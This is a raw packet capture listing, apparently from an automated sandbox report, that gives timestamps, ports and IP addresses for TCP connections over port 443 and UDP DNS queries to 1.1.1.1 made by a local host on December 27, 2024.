                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.441478014 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605516911 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605798960 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605839968 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.606846094 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.606934071 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607249975 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607307911 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607403040 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607419014 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607491970 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607522011 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.658379078 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.665400982 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.665489912 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.666023016 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.666033983 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.667849064 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.667855024 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700431108 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700578928 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700921059 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700937033 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700956106 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700982094 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.974711895 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.974800110 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.975400925 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.975431919 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.975450993 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.975496054 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.206003904 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.206239939 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.206360102 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.206851959 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.206892014 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.620805979 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.620874882 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.620974064 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.621229887 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.621244907 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.622756004 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.622776031 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.622872114 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.623071909 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.623081923 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.071705103 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.071768045 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.072611094 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.072621107 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.076986074 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.076992035 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.985625982 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.985712051 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.985784054 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.985994101 CET50034443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.986016989 CET44350034116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.050163031 CET4434994123.57.90.143192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.050249100 CET4434994123.57.90.143192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.050312042 CET49941443192.168.2.523.57.90.143
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.700983047 CET49923443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.700999022 CET44349923172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701016903 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701050043 CET49928443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701086044 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701090097 CET44349928172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701142073 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701174974 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701205015 CET49927443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701210976 CET44349927172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701256990 CET49926443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701272964 CET44349926172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701337099 CET49941443192.168.2.523.57.90.143
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.701351881 CET4434994123.57.90.143192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.726820946 CET4434994923.57.90.145192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.726910114 CET4434994923.57.90.145192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:43.727128983 CET49949443192.168.2.523.57.90.145
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:45.465224981 CET49949443192.168.2.523.57.90.145
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:45.465240955 CET4434994923.57.90.145192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.382920980 CET4434997523.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.383105993 CET4434997523.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.383234024 CET49975443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.517813921 CET4434997623.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.517905951 CET4434997623.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:48.517988920 CET49976443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:49.214508057 CET49975443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:49.214560986 CET4434997523.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:49.214562893 CET49976443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:49.214569092 CET4434997623.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.287182093 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.287273884 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.287348032 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.309473038 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.309526920 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:52.309607983 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:54.662089109 CET4435001523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:54.662199974 CET50015443192.168.2.523.1.237.91

                                                                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:02.716891050 CET5039553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:02.949616909 CET53503951.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.552586079 CET5008653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.690644026 CET53500861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.740348101 CET5982553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.046957970 CET53598251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.720457077 CET53627341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.730393887 CET6488253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.730580091 CET5426453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.867925882 CET53648821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.960066080 CET53542641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.677289009 CET53538921.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:02.173192978 CET53635031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:02.799066067 CET53573791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:13.948277950 CET5602353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:13.948580980 CET5276753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:14.086261034 CET53527671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:16.828819036 CET5226153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:16.829001904 CET6476353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.576400995 CET6127253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.576569080 CET5806653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.713632107 CET53612721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:17.714078903 CET53580661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.785406113 CET5448453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.785676003 CET6302653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.786103964 CET5304353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.786315918 CET5948653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.792994022 CET6067453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.793138981 CET5758653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922343016 CET53630261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922729015 CET53544841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.922841072 CET53530431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.923219919 CET53594861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.929986954 CET53606741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.930006981 CET53575861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:20.946927071 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.257649899 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.859539986 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958013058 CET6243553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958115101 CET6348153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960062981 CET5633053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960278988 CET5362353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.068859100 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.095556021 CET53634811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET53624351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.116400957 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.116547108 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117027044 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117137909 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117703915 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.118860006 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.128540993 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.160511017 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.189304113 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.378279924 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.441926956 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442116976 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442135096 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442143917 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.446154118 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.446233034 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.454850912 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457261086 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457356930 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457765102 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457875967 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.464467049 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.464648008 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.467776060 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.474001884 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.485205889 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.485707045 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.486430883 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.486957073 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.487087011 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.487211943 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.491405964 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.504235029 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.769037962 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.794693947 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.797528982 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.798396111 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.809274912 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.810570955 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.811012030 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.814814091 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.815417051 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.820427895 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.827667952 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.828525066 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.839493990 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.842108965 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.842526913 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.863421917 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.988112926 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.143656015 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.144304991 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.164122105 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.166445017 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.167090893 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.167105913 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168071985 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168247938 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168359041 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192141056 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192152977 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192162037 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192460060 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245683908 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245698929 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245712042 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245784998 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.246315002 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.247632980 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.249186993 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.320745945 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.579875946 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.579969883 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.579979897 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.579988956 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.580773115 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.580852985 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.581002951 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.913103104 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.945794106 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.074455976 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.074681997 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.408890009 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.410140038 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.430668116 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.430895090 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.604712009 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.605396032 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.606534958 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.607140064 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.799551010 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.799771070 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.928335905 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.929101944 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.929235935 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.930321932 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.939697027 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.940387011 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.940782070 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:24.941253901 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:25.123660088 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:25.125520945 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:25.138537884 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:25.138792992 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.486016989 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.546335936 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.546787977 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.551917076 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.794780970 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.865144968 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.871836901 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.873358965 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.874263048 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:27.874499083 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:28.403044939 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:28.478142977 CET53668443192.168.2.523.200.88.9
